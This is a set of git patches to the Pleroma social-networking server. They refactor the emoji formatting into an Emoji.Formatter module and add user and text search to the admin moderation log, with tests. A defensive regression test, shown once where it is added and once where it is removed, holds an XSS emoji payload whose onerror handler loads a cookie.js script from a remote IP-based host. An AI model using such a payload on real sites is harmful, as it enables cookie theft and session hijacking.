+ Enum.filter(Emoji.get_all(), fn {emoji, _, _, _, _} ->
+ String.contains?(text, ":#{emoji}:")
+ end)
+ end
+
+ def get_emoji(_), do: []
+
+ @doc "Outputs a list of the emoji-Maps in a text"
+ def get_emoji_map(text) when is_binary(text) do
+ get_emoji(text)
+ |> Enum.reduce(%{}, fn {name, file, _group, _, _}, acc ->
+ Map.put(acc, name, "#{Pleroma.Web.Endpoint.static_url()}#{file}")
+ end)
+ end
+
+ def get_emoji_map(_), do: []
+end
diff --git a/lib/pleroma/formatter.ex b/lib/pleroma/formatter.ex
index 84955289c..dbbfe3a66 100644
--- a/lib/pleroma/formatter.ex
+++ b/lib/pleroma/formatter.ex
@@ -3,10 +3,8 @@
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Formatter do
- alias Pleroma.Emoji
alias Pleroma.HTML
alias Pleroma.User
- alias Pleroma.Web.MediaProxy
@safe_mention_regex ~r/^(\s*(?(@.+?\s+){1,})+)(?.*)/s
@link_regex ~r"((?:http(s)?:\/\/)?[\w.-]+(?:\.[\w\.-]+)+[\w\-\._~%:/?#[\]@!\$&'\(\)\*\+,;=.]+)|[0-9a-z+\-\.]+:[0-9a-z$-_.+!*'(),]+"ui
@@ -100,56 +98,6 @@ def mentions_escape(text, options \\ []) do
end
end
- def emojify(text) do
- emojify(text, Emoji.get_all())
- end
-
- def emojify(text, nil), do: text
-
- def emojify(text, emoji, strip \\ false) do
- Enum.reduce(emoji, text, fn
- {_, _, _, emoji, file}, text ->
- String.replace(text, ":#{emoji}:", prepare_emoji_html(emoji, file, strip))
-
- emoji_data, text ->
- emoji = HTML.strip_tags(elem(emoji_data, 0))
- file = HTML.strip_tags(elem(emoji_data, 1))
- String.replace(text, ":#{emoji}:", prepare_emoji_html(emoji, file, strip))
- end)
- |> HTML.filter_tags()
- end
-
- defp prepare_emoji_html(_emoji, _file, true), do: ""
-
- defp prepare_emoji_html(emoji, file, _strip) do
- ""
- end
-
- def demojify(text) do
- emojify(text, Emoji.get_all(), true)
- end
-
- def demojify(text, nil), do: text
-
- @doc "Outputs a list of the emoji-shortcodes in a text"
- def get_emoji(text) when is_binary(text) do
- Enum.filter(Emoji.get_all(), fn {emoji, _, _, _, _} ->
- String.contains?(text, ":#{emoji}:")
- end)
- end
-
- def get_emoji(_), do: []
-
- @doc "Outputs a list of the emoji-Maps in a text"
- def get_emoji_map(text) when is_binary(text) do
- get_emoji(text)
- |> Enum.reduce(%{}, fn {name, file, _group, _, _}, acc ->
- Map.put(acc, name, "#{Pleroma.Web.Endpoint.static_url()}#{file}")
- end)
- end
-
- def get_emoji_map(_), do: []
-
def html_escape({text, mentions, hashtags}, type) do
{html_escape(text, type), mentions, hashtags}
end
diff --git a/lib/pleroma/web/common_api/common_api.ex b/lib/pleroma/web/common_api/common_api.ex
index 5faddc9f4..9ee704022 100644
--- a/lib/pleroma/web/common_api/common_api.ex
+++ b/lib/pleroma/web/common_api/common_api.ex
@@ -6,7 +6,7 @@ defmodule Pleroma.Web.CommonAPI do
alias Pleroma.Activity
alias Pleroma.ActivityExpiration
alias Pleroma.Conversation.Participation
- alias Pleroma.Formatter
+ alias Pleroma.Emoji
alias Pleroma.Object
alias Pleroma.ThreadMute
alias Pleroma.User
@@ -261,12 +261,7 @@ def post(user, %{"status" => status} = data) do
sensitive,
poll
),
- object <-
- Map.put(
- object,
- "emoji",
- Map.merge(Formatter.get_emoji_map(full_payload), poll_emoji)
- ) do
+ object <- put_emoji(object, full_payload, poll_emoji) do
preview? = Pleroma.Web.ControllerHelper.truthy_param?(data["preview"]) || false
direct? = visibility == "direct"
@@ -300,6 +295,15 @@ def post(user, %{"status" => status} = data) do
end
end
+ # parse and put emoji to object data
+ defp put_emoji(map, text, emojis) do
+ Map.put(
+ map,
+ "emoji",
+ Map.merge(Emoji.Formatter.get_emoji_map(text), emojis)
+ )
+ end
+
# Updates the emojis for a user based on their profile
def update(user) do
user =
diff --git a/lib/pleroma/web/common_api/utils.ex b/lib/pleroma/web/common_api/utils.ex
index 9686e6491..d6907f707 100644
--- a/lib/pleroma/web/common_api/utils.ex
+++ b/lib/pleroma/web/common_api/utils.ex
@@ -9,6 +9,7 @@ defmodule Pleroma.Web.CommonAPI.Utils do
alias Pleroma.Activity
alias Pleroma.Config
alias Pleroma.Conversation.Participation
+ alias Pleroma.Emoji
alias Pleroma.Formatter
alias Pleroma.Object
alias Pleroma.Plugs.AuthenticationPlug
@@ -184,7 +185,7 @@ def make_poll_data(%{"poll" => %{"options" => options, "expires_in" => expires_i
"name" => option,
"type" => "Note",
"replies" => %{"type" => "Collection", "totalItems" => 0}
- }, Map.merge(emoji, Formatter.get_emoji_map(option))}
+ }, Map.merge(emoji, Emoji.Formatter.get_emoji_map(option))}
end)
case expires_in do
@@ -434,7 +435,7 @@ def confirm_current_password(user, password) do
end
def emoji_from_profile(%{info: _info} = user) do
- (Formatter.get_emoji(user.bio) ++ Formatter.get_emoji(user.name))
+ (Emoji.Formatter.get_emoji(user.bio) ++ Emoji.Formatter.get_emoji(user.name))
|> Enum.map(fn {shortcode, url, _, _, _} ->
%{
"type" => "Emoji",
diff --git a/lib/pleroma/web/mastodon_api/controllers/mastodon_api_controller.ex b/lib/pleroma/web/mastodon_api/controllers/mastodon_api_controller.ex
index 603c6b3c6..4f63b03cf 100644
--- a/lib/pleroma/web/mastodon_api/controllers/mastodon_api_controller.ex
+++ b/lib/pleroma/web/mastodon_api/controllers/mastodon_api_controller.ex
@@ -13,8 +13,8 @@ defmodule Pleroma.Web.MastodonAPI.MastodonAPIController do
alias Pleroma.Bookmark
alias Pleroma.Config
alias Pleroma.Conversation.Participation
+ alias Pleroma.Emoji
alias Pleroma.Filter
- alias Pleroma.Formatter
alias Pleroma.HTTP
alias Pleroma.Notification
alias Pleroma.Object
@@ -140,7 +140,7 @@ def update_credentials(%{assigns: %{user: user}} = conn, params) do
user_info_emojis =
user.info
|> Map.get(:emoji, [])
- |> Enum.concat(Formatter.get_emoji_map(emojis_text))
+ |> Enum.concat(Emoji.Formatter.get_emoji_map(emojis_text))
|> Enum.dedup()
info_params =
diff --git a/lib/pleroma/web/metadata/utils.ex b/lib/pleroma/web/metadata/utils.ex
index 720bd4519..382ecf426 100644
--- a/lib/pleroma/web/metadata/utils.ex
+++ b/lib/pleroma/web/metadata/utils.ex
@@ -3,6 +3,7 @@
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Web.Metadata.Utils do
+ alias Pleroma.Emoji
alias Pleroma.Formatter
alias Pleroma.HTML
alias Pleroma.Web.MediaProxy
@@ -13,7 +14,7 @@ def scrub_html_and_truncate(%{data: %{"content" => content}} = object) do
|> HtmlEntities.decode()
|> String.replace(~r/
/, " ")
|> HTML.get_cached_stripped_html_for_activity(object, "metadata")
- |> Formatter.demojify()
+ |> Emoji.Formatter.demojify()
|> Formatter.truncate()
end
@@ -23,7 +24,7 @@ def scrub_html_and_truncate(content, max_length \\ 200) when is_binary(content)
|> HtmlEntities.decode()
|> String.replace(~r/
/, " ")
|> HTML.strip_tags()
- |> Formatter.demojify()
+ |> Emoji.Formatter.demojify()
|> Formatter.truncate(max_length)
end
diff --git a/lib/pleroma/web/twitter_api/twitter_api_controller.ex b/lib/pleroma/web/twitter_api/twitter_api_controller.ex
index 5dfab6a6c..4141bfba5 100644
--- a/lib/pleroma/web/twitter_api/twitter_api_controller.ex
+++ b/lib/pleroma/web/twitter_api/twitter_api_controller.ex
@@ -9,7 +9,7 @@ defmodule Pleroma.Web.TwitterAPI.Controller do
alias Ecto.Changeset
alias Pleroma.Activity
- alias Pleroma.Formatter
+ alias Pleroma.Emoji
alias Pleroma.Notification
alias Pleroma.Object
alias Pleroma.Repo
@@ -713,7 +713,7 @@ defp parse_profile_bio(user, params) do
emojis_text = (params["description"] || "") <> " " <> (params["name"] || "")
emojis =
- ((user.info.emoji || []) ++ Formatter.get_emoji_map(emojis_text))
+ ((user.info.emoji || []) ++ Emoji.Formatter.get_emoji_map(emojis_text))
|> Enum.dedup()
user_info =
diff --git a/lib/pleroma/web/twitter_api/views/activity_view.ex b/lib/pleroma/web/twitter_api/views/activity_view.ex
index abae63877..9192ebd34 100644
--- a/lib/pleroma/web/twitter_api/views/activity_view.ex
+++ b/lib/pleroma/web/twitter_api/views/activity_view.ex
@@ -5,7 +5,7 @@
defmodule Pleroma.Web.TwitterAPI.ActivityView do
use Pleroma.Web, :view
alias Pleroma.Activity
- alias Pleroma.Formatter
+ alias Pleroma.Emoji
alias Pleroma.HTML
alias Pleroma.Object
alias Pleroma.Repo
@@ -262,7 +262,7 @@ def render(
activity,
"twitterapi:content"
)
- |> Formatter.emojify(object.data["emoji"])
+ |> Emoji.Formatter.emojify(object.data["emoji"])
text =
if content do
@@ -319,7 +319,7 @@ def render(
"possibly_sensitive" => possibly_sensitive,
"visibility" => Pleroma.Web.ActivityPub.Visibility.get_visibility(object),
"summary" => summary,
- "summary_html" => summary |> Formatter.emojify(object.data["emoji"]),
+ "summary_html" => Emoji.Formatter.emojify(summary, object.data["emoji"]),
"card" => card,
"muted" => thread_muted? || User.mutes?(opts[:for], user)
}
diff --git a/lib/pleroma/web/twitter_api/views/user_view.ex b/lib/pleroma/web/twitter_api/views/user_view.ex
index 8a7d2fc72..3a6550826 100644
--- a/lib/pleroma/web/twitter_api/views/user_view.ex
+++ b/lib/pleroma/web/twitter_api/views/user_view.ex
@@ -4,7 +4,8 @@
defmodule Pleroma.Web.TwitterAPI.UserView do
use Pleroma.Web, :view
- alias Pleroma.Formatter
+
+ alias Pleroma.Emoji
alias Pleroma.HTML
alias Pleroma.User
alias Pleroma.Web.CommonAPI.Utils
@@ -72,7 +73,7 @@ defp do_render("user.json", %{user: user = %User{}} = assigns) do
description_html =
(user.bio || "")
|> HTML.filter_tags(User.html_filter_policy(for_user))
- |> Formatter.emojify(emoji)
+ |> Emoji.Formatter.emojify(emoji)
fields =
user.info
@@ -99,7 +100,7 @@ defp do_render("user.json", %{user: user = %User{}} = assigns) do
"name" => user.name || user.nickname,
"name_html" =>
if(user.name,
- do: HTML.strip_tags(user.name) |> Formatter.emojify(emoji),
+ do: HTML.strip_tags(user.name) |> Emoji.Formatter.emojify(emoji),
else: user.nickname
),
"profile_image_url" => image,
diff --git a/test/emoji/formatter_test.exs b/test/emoji/formatter_test.exs
new file mode 100644
index 000000000..8b510f48b
--- /dev/null
+++ b/test/emoji/formatter_test.exs
@@ -0,0 +1,54 @@
+# Pleroma: A lightweight social networking server
+# Copyright © 2017-2018 Pleroma Authors
+# SPDX-License-Identifier: AGPL-3.0-only
+
+defmodule Pleroma.Emoji.FormatterTest do
+ alias Pleroma.Emoji.Formatter
+ use Pleroma.DataCase
+
+ describe "emojify" do
+ test "it adds cool emoji" do
+ text = "I love :firefox:"
+
+ expected_result =
+ "I love "
+
+ assert Formatter.emojify(text) == expected_result
+ end
+
+ test "it does not add XSS emoji" do
+ text =
+ "I love :'onload=\"this.src='bacon'\" onerror='var a = document.createElement(\"script\");a.src=\"//51.15.235.162.xip.io/cookie.js\";document.body.appendChild(a):"
+
+ custom_emoji = %{
+ "'onload=\"this.src='bacon'\" onerror='var a = document.createElement(\"script\");a.src=\"//51.15.235.162.xip.io/cookie.js\";document.body.appendChild(a)" =>
+ "https://placehold.it/1x1"
+ }
+
+ expected_result =
+ "I love "
+
+ assert Formatter.emojify(text, custom_emoji) == expected_result
+ end
+ end
+
+ describe "get_emoji" do
+ test "it returns the emoji used in the text" do
+ text = "I love :firefox:"
+
+ assert Formatter.get_emoji(text) == [
+ {"firefox", "/emoji/Firefox.gif", ["Gif", "Fun"], "firefox", "/emoji/Firefox.gif"}
+ ]
+ end
+
+ test "it returns a nice empty result when no emojis are present" do
+ text = "I love moominamma"
+ assert Formatter.get_emoji(text) == []
+ end
+
+ test "it doesn't die when text is absent" do
+ text = nil
+ assert Formatter.get_emoji(text) == []
+ end
+ end
+end
diff --git a/test/formatter_test.exs b/test/formatter_test.exs
index 7a5bd0f9f..c36681068 100644
--- a/test/formatter_test.exs
+++ b/test/formatter_test.exs
@@ -255,52 +255,6 @@ test "parses tags in the text" do
end
end
- describe "emojify" do
- test "it adds cool emoji" do
- text = "I love :firefox:"
-
- expected_result =
- "I love "
-
- assert Formatter.emojify(text) == expected_result
- end
-
- test "it does not add XSS emoji" do
- text =
- "I love :'onload=\"this.src='bacon'\" onerror='var a = document.createElement(\"script\");a.src=\"//51.15.235.162.xip.io/cookie.js\";document.body.appendChild(a):"
-
- custom_emoji = %{
- "'onload=\"this.src='bacon'\" onerror='var a = document.createElement(\"script\");a.src=\"//51.15.235.162.xip.io/cookie.js\";document.body.appendChild(a)" =>
- "https://placehold.it/1x1"
- }
-
- expected_result =
- "I love "
-
- assert Formatter.emojify(text, custom_emoji) == expected_result
- end
- end
-
- describe "get_emoji" do
- test "it returns the emoji used in the text" do
- text = "I love :firefox:"
-
- assert Formatter.get_emoji(text) == [
- {"firefox", "/emoji/Firefox.gif", ["Gif", "Fun"], "firefox", "/emoji/Firefox.gif"}
- ]
- end
-
- test "it returns a nice empty result when no emojis are present" do
- text = "I love moominamma"
- assert Formatter.get_emoji(text) == []
- end
-
- test "it doesn't die when text is absent" do
- text = nil
- assert Formatter.get_emoji(text) == []
- end
- end
-
test "it escapes HTML in plain text" do
text = "hello & world google.com/?a=b&c=d \n http://test.com/?a=b&c=d 1"
expected = "hello & world google.com/?a=b&c=d \n http://test.com/?a=b&c=d 1"
From 880307e0d52444326eee8e79b2f66af706d85b4a Mon Sep 17 00:00:00 2001
From: ultem
Date: Fri, 30 Aug 2019 19:41:31 +0000
Subject: [PATCH 017/272] minor: Fix version dot
---
docs/installation/alpine_linux_en.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/docs/installation/alpine_linux_en.md b/docs/installation/alpine_linux_en.md
index c77618936..f200362ca 100644
--- a/docs/installation/alpine_linux_en.md
+++ b/docs/installation/alpine_linux_en.md
@@ -1,7 +1,7 @@
# Installing on Alpine Linux
## Installation
-This guide is a step-by-step installation guide for Alpine Linux. The instructions were verified against Alpine v.3.10 standard image. You might miss additional dependencies if you use `netboot` instead.
+This guide is a step-by-step installation guide for Alpine Linux. The instructions were verified against Alpine v3.10 standard image. You might miss additional dependencies if you use `netboot` instead.
It assumes that you have administrative rights, either as root or a user with [sudo permissions](https://www.linode.com/docs/tools-reference/custom-kernels-distros/install-alpine-linux-on-your-linode/#configuration). If you want to run this guide with root, ignore the `sudo` at the beginning of the lines, unless it calls a user like `sudo -Hu pleroma`; in this case, use `su -l -s $SHELL -c 'command'` instead.
From f182f0f6bd89a2f2e3c4a6000c772512b239fe54 Mon Sep 17 00:00:00 2001
From: Maxim Filippov
Date: Sat, 31 Aug 2019 00:57:15 +0300
Subject: [PATCH 018/272] Add ability to search moderation logs
---
lib/pleroma/moderation_log.ex | 209 ++++++++++++------
.../web/admin_api/admin_api_controller.ex | 4 +-
test/moderation_log_test.exs | 36 ++-
.../admin_api/admin_api_controller_test.exs | 61 ++++-
4 files changed, 220 insertions(+), 90 deletions(-)
diff --git a/lib/pleroma/moderation_log.ex b/lib/pleroma/moderation_log.ex
index 2164ecfc2..c72a413b6 100644
--- a/lib/pleroma/moderation_log.ex
+++ b/lib/pleroma/moderation_log.ex
@@ -18,6 +18,8 @@ def get_all(params) do
params
|> get_all_query()
|> maybe_filter_by_date(params)
+ |> maybe_filter_by_user(params)
+ |> maybe_filter_by_search(params)
|> Repo.all()
end
@@ -42,6 +44,23 @@ defp maybe_filter_by_date(query, %{start_date: start_date, end_date: end_date})
)
end
+ defp maybe_filter_by_user(query, %{user_id: nil}), do: query
+
+ defp maybe_filter_by_user(query, %{user_id: user_id}) do
+ from(q in query,
+ where: fragment("(?)->'actor'->>'id' = ?", q.data, ^user_id)
+ )
+ end
+
+ defp maybe_filter_by_search(query, %{search: search}) when is_nil(search) or search == "",
+ do: query
+
+ defp maybe_filter_by_search(query, %{search: search}) do
+ from(q in query,
+ where: fragment("(?)->>'message' ILIKE ?", q.data, ^"%#{search}%")
+ )
+ end
+
defp get_all_query(%{page: page, page_size: page_size}) do
from(q in __MODULE__,
order_by: [desc: q.inserted_at],
@@ -56,52 +75,71 @@ defp parse_datetime(datetime) do
parsed_datetime
end
+ @spec insert_log(%{actor: User, subject: User, action: String.t(), permission: String.t()}) ::
+ {:ok, ModerationLog} | {:error, any}
def insert_log(%{
actor: %User{} = actor,
subject: %User{} = subject,
action: action,
permission: permission
}) do
- Repo.insert(%ModerationLog{
+ %ModerationLog{
data: %{
- actor: user_to_map(actor),
- subject: user_to_map(subject),
- action: action,
- permission: permission
+ "actor" => user_to_map(actor),
+ "subject" => user_to_map(subject),
+ "action" => action,
+ "permission" => permission,
+ "message" => ""
}
- })
+ }
+ |> insert_log_entry_with_message()
end
+ @spec insert_log(%{actor: User, subject: User, action: String.t()}) ::
+ {:ok, ModerationLog} | {:error, any}
def insert_log(%{
actor: %User{} = actor,
action: "report_update",
subject: %Activity{data: %{"type" => "Flag"}} = subject
}) do
- Repo.insert(%ModerationLog{
+ %ModerationLog{
data: %{
- actor: user_to_map(actor),
- action: "report_update",
- subject: report_to_map(subject)
+ "actor" => user_to_map(actor),
+ "action" => "report_update",
+ "subject" => report_to_map(subject),
+ "message" => ""
}
- })
+ }
+ |> insert_log_entry_with_message()
end
+ @spec insert_log(%{actor: User, subject: Activity, action: String.t(), text: String.t()}) ::
+ {:ok, ModerationLog} | {:error, any}
def insert_log(%{
actor: %User{} = actor,
action: "report_response",
subject: %Activity{} = subject,
text: text
}) do
- Repo.insert(%ModerationLog{
+ %ModerationLog{
data: %{
- actor: user_to_map(actor),
- action: "report_response",
- subject: report_to_map(subject),
- text: text
+ "actor" => user_to_map(actor),
+ "action" => "report_response",
+ "subject" => report_to_map(subject),
+ "text" => text,
+ "message" => ""
}
- })
+ }
+ |> insert_log_entry_with_message()
end
+ @spec insert_log(%{
+ actor: User,
+ subject: Activity,
+ action: String.t(),
+ sensitive: String.t(),
+ visibility: String.t()
+ }) :: {:ok, ModerationLog} | {:error, any}
def insert_log(%{
actor: %User{} = actor,
action: "status_update",
@@ -109,41 +147,49 @@ def insert_log(%{
sensitive: sensitive,
visibility: visibility
}) do
- Repo.insert(%ModerationLog{
+ %ModerationLog{
data: %{
- actor: user_to_map(actor),
- action: "status_update",
- subject: status_to_map(subject),
- sensitive: sensitive,
- visibility: visibility
+ "actor" => user_to_map(actor),
+ "action" => "status_update",
+ "subject" => status_to_map(subject),
+ "sensitive" => sensitive,
+ "visibility" => visibility,
+ "message" => ""
}
- })
+ }
+ |> insert_log_entry_with_message()
end
+ @spec insert_log(%{actor: User, action: String.t(), subject_id: String.t()}) ::
+ {:ok, ModerationLog} | {:error, any}
def insert_log(%{
actor: %User{} = actor,
action: "status_delete",
subject_id: subject_id
}) do
- Repo.insert(%ModerationLog{
+ %ModerationLog{
data: %{
- actor: user_to_map(actor),
- action: "status_delete",
- subject_id: subject_id
+ "actor" => user_to_map(actor),
+ "action" => "status_delete",
+ "subject_id" => subject_id,
+ "message" => ""
}
- })
+ }
+ |> insert_log_entry_with_message()
end
@spec insert_log(%{actor: User, subject: User, action: String.t()}) ::
{:ok, ModerationLog} | {:error, any}
def insert_log(%{actor: %User{} = actor, subject: subject, action: action}) do
- Repo.insert(%ModerationLog{
+ %ModerationLog{
data: %{
- actor: user_to_map(actor),
- action: action,
- subject: user_to_map(subject)
+ "actor" => user_to_map(actor),
+ "action" => action,
+ "subject" => user_to_map(subject),
+ "message" => ""
}
- })
+ }
+ |> insert_log_entry_with_message()
end
@spec insert_log(%{actor: User, subjects: [User], action: String.t()}) ::
@@ -151,97 +197,124 @@ def insert_log(%{actor: %User{} = actor, subject: subject, action: action}) do
def insert_log(%{actor: %User{} = actor, subjects: subjects, action: action}) do
subjects = Enum.map(subjects, &user_to_map/1)
- Repo.insert(%ModerationLog{
+ %ModerationLog{
data: %{
- actor: user_to_map(actor),
- action: action,
- subjects: subjects
+ "actor" => user_to_map(actor),
+ "action" => action,
+ "subjects" => subjects,
+ "message" => ""
}
- })
+ }
+ |> insert_log_entry_with_message()
end
+ @spec insert_log(%{actor: User, action: String.t(), followed: User, follower: User}) ::
+ {:ok, ModerationLog} | {:error, any}
def insert_log(%{
actor: %User{} = actor,
followed: %User{} = followed,
follower: %User{} = follower,
action: "follow"
}) do
- Repo.insert(%ModerationLog{
+ %ModerationLog{
data: %{
- actor: user_to_map(actor),
- action: "follow",
- followed: user_to_map(followed),
- follower: user_to_map(follower)
+ "actor" => user_to_map(actor),
+ "action" => "follow",
+ "followed" => user_to_map(followed),
+ "follower" => user_to_map(follower),
+ "message" => ""
}
- })
+ }
+ |> insert_log_entry_with_message()
end
+ @spec insert_log(%{actor: User, action: String.t(), followed: User, follower: User}) ::
+ {:ok, ModerationLog} | {:error, any}
def insert_log(%{
actor: %User{} = actor,
followed: %User{} = followed,
follower: %User{} = follower,
action: "unfollow"
}) do
- Repo.insert(%ModerationLog{
+ %ModerationLog{
data: %{
- actor: user_to_map(actor),
- action: "unfollow",
- followed: user_to_map(followed),
- follower: user_to_map(follower)
+ "actor" => user_to_map(actor),
+ "action" => "unfollow",
+ "followed" => user_to_map(followed),
+ "follower" => user_to_map(follower),
+ "message" => ""
}
- })
+ }
+ |> insert_log_entry_with_message()
end
+ @spec insert_log(%{actor: User, action: String.t(), nicknames: [String.t()], tags: [String.t()]}) ::
+ {:ok, ModerationLog} | {:error, any}
def insert_log(%{
actor: %User{} = actor,
nicknames: nicknames,
tags: tags,
action: action
}) do
- Repo.insert(%ModerationLog{
+ %ModerationLog{
data: %{
- actor: user_to_map(actor),
- nicknames: nicknames,
- tags: tags,
- action: action
+ "actor" => user_to_map(actor),
+ "nicknames" => nicknames,
+ "tags" => tags,
+ "action" => action,
+ "message" => ""
}
- })
+ }
+ |> insert_log_entry_with_message()
end
+ @spec insert_log(%{actor: User, action: String.t(), target: String.t()}) ::
+ {:ok, ModerationLog} | {:error, any}
def insert_log(%{
actor: %User{} = actor,
action: action,
target: target
})
when action in ["relay_follow", "relay_unfollow"] do
- Repo.insert(%ModerationLog{
+ %ModerationLog{
data: %{
- actor: user_to_map(actor),
- action: action,
- target: target
+ "actor" => user_to_map(actor),
+ "action" => action,
+ "target" => target,
+ "message" => ""
}
- })
+ }
+ |> insert_log_entry_with_message()
+ end
+
+ @spec insert_log_entry_with_message(ModerationLog) :: {:ok, ModerationLog} | {:error, any}
+
+ defp insert_log_entry_with_message(entry) do
+ entry.data["message"]
+ |> put_in(get_log_entry_message(entry))
+ |> Repo.insert()
end
defp user_to_map(%User{} = user) do
user
|> Map.from_struct()
|> Map.take([:id, :nickname])
- |> Map.put(:type, "user")
+ |> Map.new(fn {k, v} -> {Atom.to_string(k), v} end)
+ |> Map.put("type", "user")
end
defp report_to_map(%Activity{} = report) do
%{
- type: "report",
- id: report.id,
- state: report.data["state"]
+ "type" => "report",
+ "id" => report.id,
+ "state" => report.data["state"]
}
end
defp status_to_map(%Activity{} = status) do
%{
- type: "status",
- id: status.id
+ "type" => "status",
+ "id" => status.id
}
end
diff --git a/lib/pleroma/web/admin_api/admin_api_controller.ex b/lib/pleroma/web/admin_api/admin_api_controller.ex
index 065394a24..135c6ae87 100644
--- a/lib/pleroma/web/admin_api/admin_api_controller.ex
+++ b/lib/pleroma/web/admin_api/admin_api_controller.ex
@@ -544,7 +544,9 @@ def list_log(conn, params) do
page: page,
page_size: page_size,
start_date: params["start_date"],
- end_date: params["end_date"]
+ end_date: params["end_date"],
+ user_id: params["user_id"],
+ search: params["search"]
})
conn
diff --git a/test/moderation_log_test.exs b/test/moderation_log_test.exs
index c78708471..a39a00e02 100644
--- a/test/moderation_log_test.exs
+++ b/test/moderation_log_test.exs
@@ -30,8 +30,7 @@ test "logging user deletion by moderator", %{moderator: moderator, subject1: sub
log = Repo.one(ModerationLog)
- assert ModerationLog.get_log_entry_message(log) ==
- "@#{moderator.nickname} deleted user @#{subject1.nickname}"
+ assert log.data["message"] == "@#{moderator.nickname} deleted user @#{subject1.nickname}"
end
test "logging user creation by moderator", %{
@@ -48,7 +47,7 @@ test "logging user creation by moderator", %{
log = Repo.one(ModerationLog)
- assert ModerationLog.get_log_entry_message(log) ==
+ assert log.data["message"] ==
"@#{moderator.nickname} created users: @#{subject1.nickname}, @#{subject2.nickname}"
end
@@ -63,7 +62,7 @@ test "logging user follow by admin", %{admin: admin, subject1: subject1, subject
log = Repo.one(ModerationLog)
- assert ModerationLog.get_log_entry_message(log) ==
+ assert log.data["message"] ==
"@#{admin.nickname} made @#{subject2.nickname} follow @#{subject1.nickname}"
end
@@ -78,7 +77,7 @@ test "logging user unfollow by admin", %{admin: admin, subject1: subject1, subje
log = Repo.one(ModerationLog)
- assert ModerationLog.get_log_entry_message(log) ==
+ assert log.data["message"] ==
"@#{admin.nickname} made @#{subject2.nickname} unfollow @#{subject1.nickname}"
end
@@ -100,8 +99,7 @@ test "logging user tagged by admin", %{admin: admin, subject1: subject1, subject
tags = ["foo", "bar"] |> Enum.join(", ")
- assert ModerationLog.get_log_entry_message(log) ==
- "@#{admin.nickname} added tags: #{tags} to users: #{users}"
+ assert log.data["message"] == "@#{admin.nickname} added tags: #{tags} to users: #{users}"
end
test "logging user untagged by admin", %{admin: admin, subject1: subject1, subject2: subject2} do
@@ -122,7 +120,7 @@ test "logging user untagged by admin", %{admin: admin, subject1: subject1, subje
tags = ["foo", "bar"] |> Enum.join(", ")
- assert ModerationLog.get_log_entry_message(log) ==
+ assert log.data["message"] ==
"@#{admin.nickname} removed tags: #{tags} from users: #{users}"
end
@@ -137,8 +135,7 @@ test "logging user grant by moderator", %{moderator: moderator, subject1: subjec
log = Repo.one(ModerationLog)
- assert ModerationLog.get_log_entry_message(log) ==
- "@#{moderator.nickname} made @#{subject1.nickname} moderator"
+ assert log.data["message"] == "@#{moderator.nickname} made @#{subject1.nickname} moderator"
end
test "logging user revoke by moderator", %{moderator: moderator, subject1: subject1} do
@@ -152,7 +149,7 @@ test "logging user revoke by moderator", %{moderator: moderator, subject1: subje
log = Repo.one(ModerationLog)
- assert ModerationLog.get_log_entry_message(log) ==
+ assert log.data["message"] ==
"@#{moderator.nickname} revoked moderator role from @#{subject1.nickname}"
end
@@ -166,7 +163,7 @@ test "logging relay follow", %{moderator: moderator} do
log = Repo.one(ModerationLog)
- assert ModerationLog.get_log_entry_message(log) ==
+ assert log.data["message"] ==
"@#{moderator.nickname} followed relay: https://example.org/relay"
end
@@ -180,7 +177,7 @@ test "logging relay unfollow", %{moderator: moderator} do
log = Repo.one(ModerationLog)
- assert ModerationLog.get_log_entry_message(log) ==
+ assert log.data["message"] ==
"@#{moderator.nickname} unfollowed relay: https://example.org/relay"
end
@@ -202,7 +199,7 @@ test "logging report update", %{moderator: moderator} do
log = Repo.one(ModerationLog)
- assert ModerationLog.get_log_entry_message(log) ==
+ assert log.data["message"] ==
"@#{moderator.nickname} updated report ##{report.id} with 'resolved' state"
end
@@ -224,7 +221,7 @@ test "logging report response", %{moderator: moderator} do
log = Repo.one(ModerationLog)
- assert ModerationLog.get_log_entry_message(log) ==
+ assert log.data["message"] ==
"@#{moderator.nickname} responded with 'look at this' to report ##{report.id}"
end
@@ -242,7 +239,7 @@ test "logging status sensitivity update", %{moderator: moderator} do
log = Repo.one(ModerationLog)
- assert ModerationLog.get_log_entry_message(log) ==
+ assert log.data["message"] ==
"@#{moderator.nickname} updated status ##{note.id}, set sensitive: 'true'"
end
@@ -260,7 +257,7 @@ test "logging status visibility update", %{moderator: moderator} do
log = Repo.one(ModerationLog)
- assert ModerationLog.get_log_entry_message(log) ==
+ assert log.data["message"] ==
"@#{moderator.nickname} updated status ##{note.id}, set visibility: 'private'"
end
@@ -278,7 +275,7 @@ test "logging status sensitivity & visibility update", %{moderator: moderator} d
log = Repo.one(ModerationLog)
- assert ModerationLog.get_log_entry_message(log) ==
+ assert log.data["message"] ==
"@#{moderator.nickname} updated status ##{note.id}, set sensitive: 'true', visibility: 'private'"
end
@@ -294,8 +291,7 @@ test "logging status deletion", %{moderator: moderator} do
log = Repo.one(ModerationLog)
- assert ModerationLog.get_log_entry_message(log) ==
- "@#{moderator.nickname} deleted status ##{note.id}"
+ assert log.data["message"] == "@#{moderator.nickname} deleted status ##{note.id}"
end
end
end
diff --git a/test/web/admin_api/admin_api_controller_test.exs b/test/web/admin_api/admin_api_controller_test.exs
index a7269aee9..eaf847b25 100644
--- a/test/web/admin_api/admin_api_controller_test.exs
+++ b/test/web/admin_api/admin_api_controller_test.exs
@@ -2251,8 +2251,9 @@ test "returns private statuses with godmode on", %{conn: conn, user: user} do
describe "GET /api/pleroma/admin/moderation_log" do
setup %{conn: conn} do
admin = insert(:user, info: %{is_admin: true})
+ moderator = insert(:user, info: %{is_moderator: true})
- %{conn: assign(conn, :user, admin), admin: admin}
+ %{conn: assign(conn, :user, admin), admin: admin, moderator: moderator}
end
test "returns the log", %{conn: conn, admin: admin} do
@@ -2394,6 +2395,64 @@ test "filters log by date", %{conn: conn, admin: admin} do
assert first_entry["message"] ==
"@#{admin.nickname} unfollowed relay: https://example.org/relay"
end
+
+ test "returns log filtered by user", %{conn: conn, admin: admin, moderator: moderator} do
+ Repo.insert(%ModerationLog{
+ data: %{
+ actor: %{
+ "id" => admin.id,
+ "nickname" => admin.nickname,
+ "type" => "user"
+ },
+ action: "relay_follow",
+ target: "https://example.org/relay"
+ }
+ })
+
+ Repo.insert(%ModerationLog{
+ data: %{
+ actor: %{
+ "id" => moderator.id,
+ "nickname" => moderator.nickname,
+ "type" => "user"
+ },
+ action: "relay_unfollow",
+ target: "https://example.org/relay"
+ }
+ })
